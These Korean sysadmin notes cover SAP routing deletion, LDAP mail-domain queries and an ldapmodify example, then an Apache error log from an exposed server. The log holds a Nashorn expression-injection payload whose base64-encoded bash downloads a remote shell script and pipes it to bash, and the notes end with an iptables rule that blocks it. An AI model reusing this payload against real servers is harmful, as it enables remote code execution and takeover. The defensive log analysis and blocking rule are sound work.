Route 삭제는 두 개의 프로그램을 통하여 가능함.
Tcode QSR6
Tcode SARA
PP_PLAN Object에서 삭제하여 대상은 Write에서 진행함.
Enter LDAP Password:
# extended LDIF
#
# LDAPv3
# base <o=domains,dc=qnct,dc=cn> with scope subtree
# filter: (domainName=*)
# requesting: ALL
#
# qnct.cn, domains, qnct.cn
dn: domainName=qnct.cn,o=domains,dc=qnct,dc=cn
objectClass: mailDomain
domainName: qnct.cn
mtaTransport: dovecot
accountSetting: minPasswordLength:8
accountSetting: defaultQuota:1024
enabledService: mail
cn: Qingdao New Century Tool
accountStatus: active
domainCurrentUserNumber: 194
domainCurrentQuotaSize: 1887436800
# qyg1.com, domains, qnct.cn
dn: domainName=qyg1.com,o=domains,dc=qnct,dc=cn
objectClass: mailDomain
domainName: qyg1.com
mtaTransport: dovecot
enabledService: mail
accountSetting: minPasswordLength:8
cn: Qingdao YG-1
accountStatus: active
domainCurrentUserNumber: 149
domainCurrentQuotaSize: 1153433600
# search result
search: 2
result: 0 Success
# numResponses: 3
# numEntries: 2
* LDAP로 항목 추가하기(빨간색이 입력하는 내용임)
# ldapmodify -a -D cn=Manager,dc=xxxx,dc=xx -W -H ldap://xxx.xxx.xxx.xxx:389 -x
Enter LDAP Password: xxxxxxxxxx
dn: mail=xxxx@xxxx.xxx,ou=Users,domainName=xxxx.xxx,o=domains,dc=xxxx,dc=xxx
changetype: modify
add: mailForwardingAddress
mailForwardingAddress: xxxx@xxxx.xxx
<--엔터를 쳐야 modify 메세지가 보임
modifying entry "mail=xxxx@xxxx.xxx,ou=Users,domainName=xxxx.xxx,o=domains,dc=xxxx,dc=xxx"
[출처 : https://jinane.tistory.com/ ]
외부에 열어 놓은 웹서버에 아래와 같은 로그가 여러 외부 IP에서 접속 이력 존재함
[Wed Jan 24 08:16:00.698387 2024] [core:error] [pid 184842] (36)File name too long: [client xxx.xxx.xxx.xxx:37814] AH00036: access to /${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','echo dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw+Ii9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA+JjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM+Ji0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK|base64 -d|bash').start()")}/ failed (filesystem path '/home/sapapi/public_html/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','echo dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw+Ii9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA+JjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM+Ji0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK|base64 -d|bash').start()")}')
로그 메세지상에 특정 텍스트 포함시 차단을 진행함.
# iptables -I INPUT -p tcp --dport 80 -m string --string "javax.script.ScriptEngineManager" --algo bm -j DROP